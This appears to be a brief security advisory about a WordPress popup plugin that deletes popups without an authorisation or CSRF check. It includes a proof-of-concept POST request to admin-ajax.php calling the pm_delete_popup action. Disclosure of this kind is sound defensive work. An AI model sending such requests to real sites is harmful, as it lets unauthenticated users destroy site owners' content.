The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check when deleting popups, which could allow unauthenticated users to delete them.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
action=pm_delete_popup&popup_id=2